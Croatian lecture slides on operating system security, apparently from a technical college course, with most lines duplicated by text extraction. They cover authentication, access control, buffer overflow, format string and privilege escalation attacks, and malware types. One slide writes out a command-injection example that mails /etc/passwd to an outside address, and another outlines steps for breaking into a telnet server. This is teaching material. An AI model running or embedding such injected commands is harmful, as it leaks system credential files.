8 os-security final

19
1 [email protected]; v2.0 1 Operacijski sustavi Operacijski sustavi Sigurnost Sigurnost Tehničko veleučilište u zagrebu Sigurnost 2 [email protected]; v2.0 Prijetnje i ciljevi Prijetnje i ciljevi Prijetnja: vidljivost podataka Prijetnja: vidljivost podataka Cilj: Tajnost podataka Cilj: Tajnost podataka Prijetnja: promjena podataka Prijetnja: promjena podataka Cilj: Integritet podataka Cilj: Integritet podataka Prijetnja: Denial of service Prijetnja: Denial of service Cilj: Visoka dostupnost sustava Cilj: Visoka dostupnost sustava Prijetnja: System pun virusa Prijetnja: System pun virusa Cilj: izolacija vanjske mreže Cilj: izolacija vanjske mreže Sigurnost

Upload: alenluky5

Post on 08-Feb-2016

22 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: 8 Os-security Final

1

[email protected]; v2.0 1

Operacijski sustaviOperacijski sustavi

SigurnostSigurnost

Tehničko veleučilište u zagrebu

Sigurnost

[email protected]; v2.0

Prijetnje i ciljeviPrijetnje i ciljevi

�� Prijetnja: vidljivost podatakaPrijetnja: vidljivost podataka�� Cilj: Tajnost podatakaCilj: Tajnost podataka

�� Prijetnja: promjena podatakaPrijetnja: promjena podataka�� Cilj: Integritet podatakaCilj: Integritet podataka

�� Prijetnja: Denial of servicePrijetnja: Denial of service�� Cilj: Visoka dostupnost sustavaCilj: Visoka dostupnost sustava

�� Prijetnja: System pun virusaPrijetnja: System pun virusa�� Cilj: izolacija vanjske mrežeCilj: izolacija vanjske mreže

Sigurnost

Page 2: 8 Os-security Final

2

[email protected]; v2.0

Treće osobeTreće osobe

�� Četiri najčešće kategorijeČetiri najčešće kategorije�� Slučajan upad od strane informatički slabo obrazovanih ljudiSlučajan upad od strane informatički slabo obrazovanih ljudi

�� Korištenjem gotovih alata često iz znatiželjeKorištenjem gotovih alata često iz znatiželje

�� Istraživanje od strane zaposlenika Istraživanje od strane zaposlenika �� Istraživanje iznutra: studenti, zaposlenici, ulazu svoje radno vrijeme, Istraživanje iznutra: studenti, zaposlenici, ulazu svoje radno vrijeme, često iz želje za osvetom ili radi dokazivanjačesto iz želje za osvetom ili radi dokazivanja

�� Postupci provale zbog ostvarenja financijske koristiPostupci provale zbog ostvarenja financijske koristi�� “Plati ili ću ti uništiti bazu”“Plati ili ću ti uništiti bazu”

�� Komercijalna ili vojna špijunažaKomercijalna ili vojna špijunaža�� Dolazak do bitnih podataka radi ostvarivanja prednosti na nekom Dolazak do bitnih podataka radi ostvarivanja prednosti na nekom tržištutržištu

Sigurnost

[email protected]; v2.0

Gubici podatakaGubici podataka

�� RazloziRazlozi�� Slučajnost (act of God): vatra, poplava, potresi…Slučajnost (act of God): vatra, poplava, potresi…

�� Sklopovske ili programske greške: CPU, disc, mrežaSklopovske ili programske greške: CPU, disc, mreža

�� Ljudske pogreške: krivi unos, izgubljeni backup…Ljudske pogreške: krivi unos, izgubljeni backup…

Sigurnost

Page 3: 8 Os-security Final

3

[email protected]; v2.0

Zaštita podatakaZaštita podataka

�� Kripotografijom:Kripotografijom:�� Jednostavan pregledJednostavan pregled

�� Simetrični algoritmiSimetrični algoritmi

�� Asimetrični algoritmi (privatni i javni ključ)Asimetrični algoritmi (privatni i javni ključ)

�� Jednosmjerne funkcije (hashJednosmjerne funkcije (hash

�� Čine osnovuČine osnovu��Digitalni potpisDigitalni potpis

��Digitalna omotnicaDigitalna omotnica

��Digitalni pečatDigitalni pečat

Sigurnost

[email protected]; v2.0

Što štititi?Što štititi?

�� SklopovljeSklopovlje�� CPU, memorijske segmente, disk, printer…CPU, memorijske segmente, disk, printer…

�� ProgramePrograme�� Procesi, datoteke, baze, semafore….Procesi, datoteke, baze, semafore….

�� Svaki objekt koji se štiti ima jedinstveno ime i akcije koje može izvršitiSvaki objekt koji se štiti ima jedinstveno ime i akcije koje može izvršiti�� Domena je set podataka. Svaki podatak sastoji se od objekta i pravila Domena je set podataka. Svaki podatak sastoji se od objekta i pravila (akcije)(akcije)

�� Objekti ulaze u domene sa ciljem da svaka domena ima minimum Objekti ulaze u domene sa ciljem da svaka domena ima minimum objekata i privilegijaobjekata i privilegija

Sigurnost

Page 4: 8 Os-security Final

4

[email protected]; v2.0

UNIX princip domenaUNIX princip domena�� Svaki korisnik kada se spoji dobiva UID i GID Svaki korisnik kada se spoji dobiva UID i GID

�� Dva procesa pokrenuta pod istim UIDDva procesa pokrenuta pod istim UID--om i GIDom i GID--om imaju jednak om imaju jednak pristup svim resursimapristup svim resursima

�� Kod sistemskog poziva proces ulazi u kernel mod u kojem mijenja Kod sistemskog poziva proces ulazi u kernel mod u kojem mijenja domenu , prema tome mu se omogućuje pristup dodatnom setu domenu , prema tome mu se omogućuje pristup dodatnom setu resursaresursa

�� SETGID SETUID bit omogućuju procesu da promjeni GID i SETGID SETUID bit omogućuju procesu da promjeni GID i UID u trenutku pokretanja (windows: run as a administrator). UID u trenutku pokretanja (windows: run as a administrator). Time dobiva povlaštene resurse.Time dobiva povlaštene resurse.

�� Kako s time radi OS?. Odgovor je protection matrixKako s time radi OS?. Odgovor je protection matrix

Sigurnost

[email protected]; v2.0

UNIX princip domenaUNIX princip domena

�� Što ako želimo omogućiti promjenu domena Što ako želimo omogućiti promjenu domena procesu?procesu?�� Dodajemo u matricu i domene Dodajemo u matricu i domene

�� Enter označava da se domena može promijenitiEnter označava da se domena može promijeniti

Sigurnost

Page 5: 8 Os-security Final

5

[email protected]; v2.0

U praksiU praksi�� Spremanje ovakve matrice bi zauzelo previše nepotrebnog prostoraSpremanje ovakve matrice bi zauzelo previše nepotrebnog prostora�� Koristiti access control list (ACL)Koristiti access control list (ACL)

�� Tri procesa A, B i C Tri procesa A, B i C �� Svaki u vlasništvu svog korisnika A,B i CSvaki u vlasništvu svog korisnika A,B i C

�� Tri datoteke F1, F2 i F3Tri datoteke F1, F2 i F3�� Svaka datoteka definira pristupne mogućnosti za svakog Svaka datoteka definira pristupne mogućnosti za svakog korisnika: R read W write X executekorisnika: R read W write X execute

�� Dodatno se definiraju i mogućnosti koje korisnik može Dodatno se definiraju i mogućnosti koje korisnik može primijeniti nad datotekomprimijeniti nad datotekom

�� CopyCopy�� RemoveRemove�� Destroy…Destroy…

Sigurnost

[email protected]; v2.0

SigurnostSigurnost

�� Da li je moguće izgraditi sigurni računalni sustav?Da li je moguće izgraditi sigurni računalni sustav?�� DADA�� Ako je zašto ga ne napravimo?Ako je zašto ga ne napravimo?

�� Sustavi koji su sigurniSustavi koji su sigurni�� Značajno ograničavaju korisnikaZnačajno ograničavaju korisnika�� Za proizvođača nisu ekonomski isplativi ( da li kupiti nadogradnju ako Za proizvođača nisu ekonomski isplativi ( da li kupiti nadogradnju ako imate koristan i siguran OS)imate koristan i siguran OS)

�� Primjer Primjer �� EE--mail se prije slao kao ASCII tekst i bio je siguranmail se prije slao kao ASCII tekst i bio je siguran

�� Danas kada se šalju prilozi, ili kao html postao je nesiguranDanas kada se šalju prilozi, ili kao html postao je nesiguran�� Da li ste voljni toga se odreći?Da li ste voljni toga se odreći?

�� Web straniceWeb stranice�� Prije su bile pasivne (statičan html)Prije su bile pasivne (statičan html)�� Da li ste voljni se vratiti unazad? Da li ste voljni se vratiti unazad?

Sigurnost

Page 6: 8 Os-security Final

6

[email protected]; v2.0

Sustavi od povjerenja Sustavi od povjerenja

�� Bolja definicija od sigurnih sustavaBolja definicija od sigurnih sustava�� Takav sustav građen je od minimalnog TCB Takav sustav građen je od minimalnog TCB elementa (Trusted computer base)elementa (Trusted computer base)�� Detalji građe takvog sustavaDetalji građe takvog sustava

��minimun koda u jezgri većina kao korisnički procesiminimun koda u jezgri većina kao korisnički procesi��Minimalna veličina TCB elementa Minimalna veličina TCB elementa

�� Zašto bi printer bio u TCB elementu?Zašto bi printer bio u TCB elementu?�� Zašto je datotečni sustav u TCB elementu!Zašto je datotečni sustav u TCB elementu!

�� Važan dio sustava je monitor (nadzornik sustava)Važan dio sustava je monitor (nadzornik sustava)�� Sve sigurnosne odluke se nalaze u njemu i on odlučuje jediniSve sigurnosne odluke se nalaze u njemu i on odlučuje jedini

Sigurnost

[email protected]; v2.0

Autentifikacija i identifikacijaAutentifikacija i identifikacija

�� IdentifikacijaIdentifikacija�� Element kojim se jedinstveno opisuje userElement kojim se jedinstveno opisuje user

�� Poznat svima , npr usernamePoznat svima , npr username

�� AutentifikacijaAutentifikacija�� Potvrda da je to stvarno ta osobaPotvrda da je to stvarno ta osoba

��Nešto što samo korisnik zna (lozinku)Nešto što samo korisnik zna (lozinku)

��Nešto što samo korisnik posjeduje (token)Nešto što samo korisnik posjeduje (token)

��Nešto što korisnik je (otisak prsta)Nešto što korisnik je (otisak prsta)

Sigurnost

Page 7: 8 Os-security Final

7

[email protected]; v2.0

AutentifikacijaAutentifikacija

�� LozinkeLozinke�� Uzmite knjigu poznatih prezimena i imenaUzmite knjigu poznatih prezimena i imena

�� Kombinirajte sa brojevimaKombinirajte sa brojevima

�� Sa zamjenom o Sa zamjenom o --> 0 , l > 0 , l -->1…>1…

�� Pohrana lozinke?Pohrana lozinke?�� Plain textPlain text

�� Salted Salted

�� OneOne--timetime--passwordpassword

�� ChallengeChallenge--response passwordresponse password

Sigurnost

[email protected]; v2.0

Napadi iznutraNapadi iznutra

�� Logička bombaLogička bomba�� Kod koji je ciljno napisan i dio produkcijskog koda kao zaštita Kod koji je ciljno napisan i dio produkcijskog koda kao zaštita programeraprogramera

�� Aktivira se odmahAktivira se odmah�� Svaki dan/tjedan osoba popiće detonaciju Svaki dan/tjedan osoba popiće detonaciju

�� Izvršavanjem nekog drugog kodaIzvršavanjem nekog drugog koda�� Upisivanjem lozinke… Upisivanjem lozinke…

�� U slučaju otkaza U slučaju otkaza �� Logička bomba se aktiviraLogička bomba se aktivira

�� Briše datotekeBriše datoteke�� Enkriptira značajne podatkeEnkriptira značajne podatke�� Sakriva svoje tragove (self destroy)Sakriva svoje tragove (self destroy)�� ….….

Sigurnost

Page 8: 8 Os-security Final

8

[email protected]; v2.0

Napadi iznutraNapadi iznutra

�� Trap door (trojanski konj)Trap door (trojanski konj)�� Dio koda namjerno ostavljen da bi se kasnije Dio koda namjerno ostavljen da bi se kasnije osigurao zaštićen ulazosigurao zaštićen ulaz

Sigurnost

[email protected]; v2.0

Napadi iznutraNapadi iznutra

�� Login spoofingLogin spoofing

�� Izrada ekrana koji je identičan ekranu od pravog korisničkog Izrada ekrana koji je identičan ekranu od pravog korisničkog sučeljasučelja

�� Po unosu lozinke onda se bilježi i poziva se valjan programPo unosu lozinke onda se bilježi i poziva se valjan program

�� Skupljene lozinke se mogu kasnije upotrijebiti za odmazdu budući Skupljene lozinke se mogu kasnije upotrijebiti za odmazdu budući da kod otkaza poslodavac nije svjestan svih lozinki koje korisnik da kod otkaza poslodavac nije svjestan svih lozinki koje korisnik posjeduje.posjeduje.

Sigurnost

Page 9: 8 Os-security Final

9

[email protected]; v2.0

ExploitExploit

�� Primjer iskorištenja ranjivostiPrimjer iskorištenja ranjivosti�� Pokrenuti automatski port scan program koji ima podignut Pokrenuti automatski port scan program koji ima podignut recimo servis telnetrecimo servis telnet

�� Pokušavati se logirati sa guest korisničkim računomPokušavati se logirati sa guest korisničkim računom�� Ako se uspješno spoji pokrenuti program koji izaziva bugAko se uspješno spoji pokrenuti program koji izaziva bug

�� Kada se dobite SETUID pristup pokrenuti zombie program koji je Kada se dobite SETUID pristup pokrenuti zombie program koji je uvijek na raspolaganjuuvijek na raspolaganju

�� Ako nije uspjelo spajanje pogledati verziju programa koji Ako nije uspjelo spajanje pogledati verziju programa koji server koristi (najčešće piše) i pretražiti google za exploitom server koristi (najčešće piše) i pretražiti google za exploitom za telnetza telnet�� Upotrijebiti exploit za spajanje na serverUpotrijebiti exploit za spajanje na server�� Kada se dobite SETUID pristup pokrenuti zombie program koji je Kada se dobite SETUID pristup pokrenuti zombie program koji je uvijek na raspolaganjuuvijek na raspolaganju

Sigurnost

[email protected]; v2.0

ExploitExploit

�� Buffer overflow an integer overflowBuffer overflow an integer overflow�� char B[1024];char B[1024];

�� B[12000]=0B[12000]=0

�� Memorija na nekoj lokaciji će biti promijenjena?!Memorija na nekoj lokaciji će biti promijenjena?!

Buffer overflow

a) Prije pozivab) Normalan tijek i

rezervacija memorije za polje B

c) Buffer overflow

-Unos imena datoteke-unos korisničkog imena i lozinke-…

Sigurnost

Page 10: 8 Os-security Final

10

[email protected]; v2.0

ExploitExploit

�� Što ako varijabla B sadrži kod neke naredbeŠto ako varijabla B sadrži kod neke naredbe

�� Ili odmah iznada varijable B se nalazi kod?Ili odmah iznada varijable B se nalazi kod?�� Prepraviti kod da napravi jump na novu adresuPrepraviti kod da napravi jump na novu adresu

��Nova adresa može pokrenuti system call koji izmjeni Nova adresa može pokrenuti system call koji izmjeni crontab i pokrene neki servis koji do sada nije pokrenut sa crontab i pokrene neki servis koji do sada nije pokrenut sa default postavkamadefault postavkama

�� Ili ako je velika rupa i ubaciti svoj kodIli ako je velika rupa i ubaciti svoj kod

Sigurnost

[email protected]; v2.0

exploitexploit

�� Format string attackFormat string attack

�� Feature %nFeature %n�� int i=0;int i=0;

�� printf(“Hello %nworldprintf(“Hello %nworld\\n”,&i); // koliko slova do kraja ima zapisuje n”,&i); // koliko slova do kraja ima zapisuje u varijablu iu varijablu i

�� printf(“i=%d”,i) // i=6printf(“i=%d”,i) // i=6

�� Što ako program omogućava da se nešto učita i zatim to ispisujeŠto ako program omogućava da se nešto učita i zatim to ispisuje�� Što ako unesemo %n !Što ako unesemo %n !

�� Kod ispisivanja %n se neće ispisati već će prepisati varijablu iza!Kod ispisivanja %n se neće ispisati već će prepisati varijablu iza!

Sigurnost

Page 11: 8 Os-security Final

11

[email protected]; v2.0

exploitexploit�� Return to libc attackReturn to libc attack

�� Varanje library funkcije sa ciljem da prepiše u data Varanje library funkcije sa ciljem da prepiše u data dio skriptu napadača (shellcode) dio skriptu napadača (shellcode)

�� Ako je program pod SETUID privilegijama kod će Ako je program pod SETUID privilegijama kod će se izvršiti pogubno za operacijski sustav se izvršiti pogubno za operacijski sustav

Sigurnost

[email protected]; v2.0

exploitexploit

�� Code injection attackCode injection attack

�� Kod jednostavne CD naredbe pozvan:Kod jednostavne CD naredbe pozvan:

�� cp abc xyz; mail [email protected] </etc/passwdcp abc xyz; mail [email protected] </etc/passwd

Sigurnost

Page 12: 8 Os-security Final

12

[email protected]; v2.0

exploitexploit

�� Privilege escalation attackPrivilege escalation attack

�� Cron je scheduler na unix sustavimaCron je scheduler na unix sustavima

�� Postoji direktorij cron.daily , cron.hourly… u koji idu skripte za Postoji direktorij cron.daily , cron.hourly… u koji idu skripte za svakodnevno, svaki sat … izvršavanjesvakodnevno, svaki sat … izvršavanje

�� Do kernela 2.6.13Do kernela 2.6.13

�� Napadač postavi cron direktorij kao defaultNapadač postavi cron direktorij kao default

�� Ne može pisati u njega ali može uzrokovati da program padneNe može pisati u njega ali može uzrokovati da program padne

�� U tom slučaj system zapisuje core dump u taj direktorij U tom slučaj system zapisuje core dump u taj direktorij (sliku memorijskih adresa u trenutku pada programa)(sliku memorijskih adresa u trenutku pada programa)

�� Napadač može naštimati da core dump (slika memorije) bude Napadač može naštimati da core dump (slika memorije) bude kod koji će cron izvršiti!kod koji će cron izvršiti!

Sigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Malware Malware -- malicious software malicious software -- za zarazu i oštećivanje računalnog sustava bez za zarazu i oštećivanje računalnog sustava bez

obavijesti korisniku.obavijesti korisniku.�� virusivirusi

�� crvi (worm)crvi (worm)

�� trojanski konj (trojan horse)trojanski konj (trojan horse)

�� spywarespyware

�� adwareadware

�� pravni izraz u US: computer contaminantpravni izraz u US: computer contaminant

�� nastali su kao psine koje otežavaju rad kolegamanastali su kao psine koje otežavaju rad kolegama

�� sa povećavanjem brzine interneta povećao se i njihov brojsa povećavanjem brzine interneta povećao se i njihov broj

�� zarada na antivirus programima, teorija zavjere: tko piše viruse?zarada na antivirus programima, teorija zavjere: tko piše viruse?

�� zarada na raznim alatima za obranu od svega osim virusa: Lavasoft ad aware, Spybot, zarada na raznim alatima za obranu od svega osim virusa: Lavasoft ad aware, Spybot, Registry cleaner...Registry cleaner...

�� svaki pomalo čisti najbolje sam svaki pomalo čisti najbolje sam

Sigurnost

Page 13: 8 Os-security Final

13

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� VirusVirus

�� boot sector virusi boot sector virusi -- prvi virusi (Amiga, Atari..)prvi virusi (Amiga, Atari..)

�� Link virusi (počeli na PC, napadaju izvršne datoteke)Link virusi (počeli na PC, napadaju izvršne datoteke)

�� Multiparitet (Hybrid) virus Multiparitet (Hybrid) virus -- kombinacija boot i datoteke virusakombinacija boot i datoteke virusa

�� Macro virusi Macro virusi -- napadaju word/excell, neovisni o platformi, nastali 1995napadaju word/excell, neovisni o platformi, nastali 1995-->melissa>melissa

�� Mrežni virusi Mrežni virusi -- napadaju dijeljene prostore, šire se LANnapadaju dijeljene prostore, šire se LAN--om, om, --> Nimda,SQLSlammer> Nimda,SQLSlammer

�� Logic Bomb Logic Bomb -- širi se , ali se aktivira uz određeni uvjet, recimo vrijemeširi se , ali se aktivira uz određeni uvjet, recimo vrijeme-->da vinci>da vinci

�� CrossCross--sitesite--scripting virus scripting virus -- napada web aplikacije i internet preglednike napada web aplikacije i internet preglednike

�� Non resident virusi Non resident virusi –– ne nalaze se stalno u memoriji nego se izvršavaju kad se pokrene ne nalaze se stalno u memoriji nego se izvršavaju kad se pokrene neka izvršna datoteka koju su inficirali. Traže datoteke specifičnog imena ili ekstenzije i neka izvršna datoteka koju su inficirali. Traže datoteke specifičnog imena ili ekstenzije i zaražuju ih.zaražuju ih.

�� Resident virus Resident virus –– ostaju aktivni u memoriji nakon što ih se prvi puta pokreneostaju aktivni u memoriji nakon što ih se prvi puta pokrene

Sigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� VirusVirus

�� zavaravanje sustavazavaravanje sustava

�� cavity virus (piše u šuplji datoteke)cavity virus (piše u šuplji datoteke)

�� povrat originalnog datumapovrat originalnog datuma

�� ne inficira sumnjivi kod (antine inficira sumnjivi kod (anti--virus)virus)

�� blokira sistemske pozive (safeblokira sistemske pozive (safe--mode)mode)

��modificiranje koda na svakoj infekcijimodificiranje koda na svakoj infekciji

��modifikacija na jednostavni načinmodifikacija na jednostavni način

�� enkcripcija sa ključemenkcripcija sa ključem

�� polymorphic code, enkripcija sa slučajnim ključem, mijenja polymorphic code, enkripcija sa slučajnim ključem, mijenja algoritam za dekripcijualgoritam za dekripciju

��metamorphic metamorphic -- ponovno se napiše svaki putaponovno se napiše svaki puta

�� širenje virusa sa OS na hand, palm pa i mobilne uređaješirenje virusa sa OS na hand, palm pa i mobilne uređajeSigurnost

Page 14: 8 Os-security Final

14

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Crv (worm)Crv (worm)

�� koristi računala za širenjekoristi računala za širenje

�� ne ostaje na računalu sa kojega se širine ostaje na računalu sa kojega se širi

�� tipovi:tipovi:�� ee--mail mail -- u prilogu ili link na vanjsku stranicu u prilogu ili link na vanjsku stranicu -->Ana Kournikova>Ana Kournikova

�� Instant messaging Instant messaging -- kroz poruke, rijedakkroz poruke, rijedak

�� IRC IRC -- putem boota ili ručno slanje linkova ili datoteka na IRCputem boota ili ručno slanje linkova ili datoteka na IRC

�� File sharing File sharing -- p2pp2p

�� Internet Internet -- gađa TCP/IP protokol gađa TCP/IP protokol --> blaster koristi MS RPC> blaster koristi MS RPC

�� security patchsecurity patch

�� ne otvarati sumljive poruke ne otvarati sumljive poruke ----> ILOVEYOU> ILOVEYOU

Sigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Trojanski konj (Trojan horse)Trojanski konj (Trojan horse)

�� prema Grčkoj legendi o Trojiprema Grčkoj legendi o Troji

�� širenje kroz dva načinaširenje kroz dva načina

�� izmjene na valjanoj programskoj podršci (p2p alatima)izmjene na valjanoj programskoj podršci (p2p alatima)

�� razne igre, screensaver... razne igre, screensaver...

�� Ne širi se samostalno već ovisi o socijalnom inženjeringuNe širi se samostalno već ovisi o socijalnom inženjeringu

�� Primjeri:Primjeri:

�� Remote access, Email sending, Data Destructive, Proxy Trojan, FTP trojan, Security Remote access, Email sending, Data Destructive, Proxy Trojan, FTP trojan, Security disable, DoS, URL trojan disable, DoS, URL trojan

�� Mjere zaštite:Mjere zaštite:

�� ne otvarajte nepoznate poruke naročito one sa prilozimane otvarajte nepoznate poruke naročito one sa prilozima

�� onemogućite eonemogućite e--mail klijentu da automatski otvara prilogemail klijentu da automatski otvara priloge

�� izbjegavajte p2p alate , naročito exe datoteke koje skineteizbjegavajte p2p alate , naročito exe datoteke koje skinete

�� Metode zaraze: website, eMetode zaraze: website, e--mail ili otvoreni portmail ili otvoreni port

�� Maskiranje: svchost32.exe, svhost.exe, back.exeMaskiranje: svchost32.exe, svhost.exe, back.exe

�� Svaki se uklanja na svoj načinSvaki se uklanja na svoj način

Sigurnost

Page 15: 8 Os-security Final

15

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� SpywareSpyware

�� skuplja informacije o korisniku računalaskuplja informacije o korisniku računala

�� najčešće kao toolbar, usluga o vremenskoj prognozi, search tool...najčešće kao toolbar, usluga o vremenskoj prognozi, search tool...

�� Dostupne informacije:Dostupne informacije:�� Pritisci tipkovnice (lozinke i korisnička imena)Pritisci tipkovnice (lozinke i korisnička imena)

�� posjete stranicamaposjete stranicama

�� dokumenti na diskudokumenti na disku

�� slanje dokumenata na disku na mrežu ?slanje dokumenata na disku na mrežu ?

�� web forma web forma ----> kreditne kartice!> kreditne kartice!

�� Često ga i svjesno prihvaćateČesto ga i svjesno prihvaćate

�� Primjeri:Primjeri:�� CoolWebSearch CoolWebSearch -- povezan sa trojanom slao gomile informacija na webpovezan sa trojanom slao gomile informacija na web

�� Internet optimizer, 180 solutions (Zango), HuntBars, Movieland...Internet optimizer, 180 solutions (Zango), HuntBars, Movieland...

�� dvije metode legalnostidvije metode legalnosti�� prihvatite ga (licenčni ugovor) da može pristupati svim vašim podatcimaprihvatite ga (licenčni ugovor) da može pristupati svim vašim podatcima

�� da dođete do koristida dođete do koristi

�� firma je registrirana gdje je to legalnofirma je registrirana gdje je to legalnoSigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška

Sigurnost

Page 16: 8 Os-security Final

16

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Adware Adware -- advertisingadvertising--supported softwaresupported software

�� automatski prikazuje , pušta i skida reklamne materijaleautomatski prikazuje , pušta i skida reklamne materijale

�� osigurava korektnu cijenu programske podrške i nadoknadu osigurava korektnu cijenu programske podrške i nadoknadu programeru za besplatne alateprogrameru za besplatne alate

�� često su maskirani sa besplatnim igrica, screensaverčesto su maskirani sa besplatnim igrica, screensaver--ima.. ima..

�� Primjeri: bonzibuddy, PornDigger, WhenU, Smiley Central...Primjeri: bonzibuddy, PornDigger, WhenU, Smiley Central...

Sigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Čišćenje adawere i spaywareČišćenje adawere i spayware

�� Ad awere (Lavasoft)Ad awere (Lavasoft)

�� CounterSpyCounterSpy

�� Spybot search and destroySpybot search and destroy

�� Spy substractSpy substract

�� Spy sweeperSpy sweeper

�� Spyware doctorSpyware doctor

�� AVG anti spywareAVG anti spyware

�� ........

Sigurnost

Page 17: 8 Os-security Final

17

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� ali? što je sa pitaj google rješenjem?ali? što je sa pitaj google rješenjem?

�� postoje i programi koji naizgled čiste sustav, a u biti su spyware:postoje i programi koji naizgled čiste sustav, a u biti su spyware:�� zajedničko ime: rogue softwarezajedničko ime: rogue software

�� error safeerror safe

�� Pest trapPest trap

�� SpyAxeSpyAxe

�� Antivirus GoldAntivirus Gold

�� Spyware strikeSpyware strike

�� World AntispyWorld Antispy

�� Spy SheriffSpy Sheriff

�� Spy WiperSpy Wiper

�� PAL spyware RemoverPAL spyware Remover

�� PSguardPSguard

�� WinAntiVirusPro 2006WinAntiVirusPro 2006

�� WinFixerWinFixer

�� ....ima ih više!....ima ih više!

Sigurnost

[email protected]; v2.0

Maligna programska podrška Maligna programska podrška �� Korisni programi koji uključuju spywareKorisni programi koji uključuju spyware

�� BearShareBearShare

�� Bonzi buddyBonzi buddy

�� DopeWarsDopeWars

�� ErrorGuardErrorGuard

�� GroksterGrokster

�� KazaaKazaa

�� MorpheusMorpheus

�� RedLightRedLight

�� WeatherBugWeatherBug

�� Edonkey 2000Edonkey 2000

�� Sony extended copy protectionSony extended copy protection

�� Prije:Prije:�� AOL instant messengerAOL instant messenger

�� DivXDivX

�� LimeWireLimeWire

�� FlashGetFlashGetSigurnost

Page 18: 8 Os-security Final

18

[email protected]; v2.0

Anti virus alati Anti virus alati �� Pristup pronalaženja virusaPristup pronalaženja virusa

�� što sa virusom:što sa virusom:

�� pokušaj popravkapokušaj popravka

�� karantenakarantena

�� brisanje datotekebrisanje datoteke

�� rječnik virusarječnik virusa

�� sumnjivo ponašanje sumnjivo ponašanje -- korisnik izabire što ćekorisnik izabire što će

�� heuristička analiza heuristička analiza �� presreće izvršavanjepresreće izvršavanje

�� ako program modificira svoj kod tada je virusako program modificira svoj kod tada je virus

�� sandbox sandbox -- simulira se OS simulira se OS -- performanseperformanse

�� Whitelist (naročito adware)Whitelist (naročito adware)

Sigurnost

[email protected]; v2.0

Anti virus alati Anti virus alati

Sigurnost

Page 19: 8 Os-security Final

19

[email protected]; v2.0

Pokrivenost OSPokrivenost OS--a a

Sigurnost

[email protected]; v2.0

Pokrivenost OSPokrivenost OS--a a -- Embedded Embedded

SybianOS se koristi na Nokia, Sony ericsson i Motorola mobilnim uređajima

Sigurnost